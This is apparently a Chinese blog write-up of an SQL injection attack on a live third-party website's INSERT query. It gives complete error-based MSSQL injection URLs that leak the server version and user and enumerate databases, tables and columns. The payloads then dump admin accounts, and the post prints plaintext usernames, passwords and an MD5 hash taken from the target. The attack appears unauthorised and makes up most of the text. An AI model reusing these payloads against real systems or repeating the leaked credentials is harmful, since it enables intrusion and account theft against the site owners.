insert注入

群里有人在问insert型的怎么注射,insert类型的我还没碰到过呢,就去看了看,做了一下笔记备忘。
http://www.bbyoo.com/nanyin.aspx?ProID=49579′ 加一个点,报错

是insert类型的语句,百度了一下,对insert语句的注射大致有个了解,于是开始刺探信息。
提交:http://www.kunlun.com/nanyin.aspx?ProID=49579′,cast(@@version/**/as/**/int),null);–

不兼容…把int换成varchar,页面返回正常。。。百度一下,原来是mssql不允许将text或ntext型数据直接转换为int型
要想爆出信息看来得找个varchar 或nvarchar类型的字段,把后面2个对换了一下位置,成功爆出。
提交:http://www.kunlun.com/nanyin.aspx?ProID=49579′,null,cast(system_user/**/as/**/int));–
在将 nvarchar 值 ‘AFDataLogin’ 转换成数据类型 int 时失败。
很好,再接着爆信息,收集的一些如下。
version:Microsoft SQL Server 2005 – 9.00.4035.00 (Intel X86)……Edition on Windows NT 5.2 (Build 3790: Service Pack 2)
servername:SQL2005
host_name:IBM1
db_name:kunlun
user_name:dbo
可以看出 web与数据库分离,看来想差异备份或log备份是不行的了,只能爆后台帐号、密码进后台了。
先爆一下库,构造
http://www.bbyoo.com/nanyin.aspx?ProID=49579′,null,null);select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=1/**/and/**/1=(select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=1)–
修改第最后一个dbid的值,爆出13个库…
1:master
2:tempdb
3:model
4:msdb
5:kunlun_BBS
6:kunlun
7:New_AF
8:AF_Back
9:Console
10:Newkunlun
11:Newkunlun2
12:Oldkunlun
13:NewBBS
接下来爆表名
构造: http://www.bbyoo.com/nanyin.aspx?ProID=49579′,null,null);select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=1/**/and/**/1=(select/**/top/**/1/**/name/**/from/**/sysobjects/**/where/**/xtype=’u’/**/and/**/name/**/not/**/in(select/**/top/**/0/**/name/**/from/**/sysobjects/**/where/**/xtype=’u’))–
修改第二个top的值,从0递增上去。爆第六张表时很开心,马上去爆字段、密码。
1:AF_UserAccount
2:YX_Unit
3:AF_UnionCompany
4:YX_FlashXZ
5:AF_UserPointLogs
6:Buy_Admin
爆指定表Buy_Admin的字段
http://www.bbyoo.com/nanyin.aspx?ProID=49579′,null,null);select/**/name/**/from/**/master.dbo.sysdatabases/**/where/**/dbid=1/**/and/**/1=(select/**/top/**/1/**/name/**/from/**/syscolumns/**/where/**/id/**/in/**/(select/**/id/**/from/**/sysobjects/**/where/**/name=’Buy_Admin’)/**/and/**/name/**/not/**/in/**/(select/**/top/**/0/**/name/**/from/**/syscolumns/**/where/**/id/**/in/**/(select/**/id/**/from/**/sysobjects/**/where/**/name=’Buy_Admin’)))–
爆出来了,一样是修改第二个top的值。
密码:af_APass
ID:af_ID
用户:af_AName
看到name和pass很开心啊,马上爆内容。
提交:
http://www.bbyoo.com/nanyin.aspx?ProID=49579′,null,null);select/**/*/**/from/**/Buy_Admin/**/where/**/af_ID=2/**/and/**/1=(select/**/af_AName/**/from/**/Buy_Admin/**/where/**/af_ID=2)–
爆出来了,还是明文的,呵呵,找后台登录。
hjbadmin hjbmanager
yck’ yck
高兴早了,怎么也登录不了。唉,再爆表把,爆到第N张,看见YX_Manage,开心了,这回没错了,爆字段爆内容
YX_AdminUser YX_Pwd
hgnadmin 50252EC697150CC9AA69A47333C716B8
可惜啊,md5解密不出….到这里差不多就结束了。很晚了。
哦,忘了说了,这个是dbo权限,呵呵。
本文转自独自等待博客由网络安全攻防研究室(www.91ri.org)信息安全小组收集整理.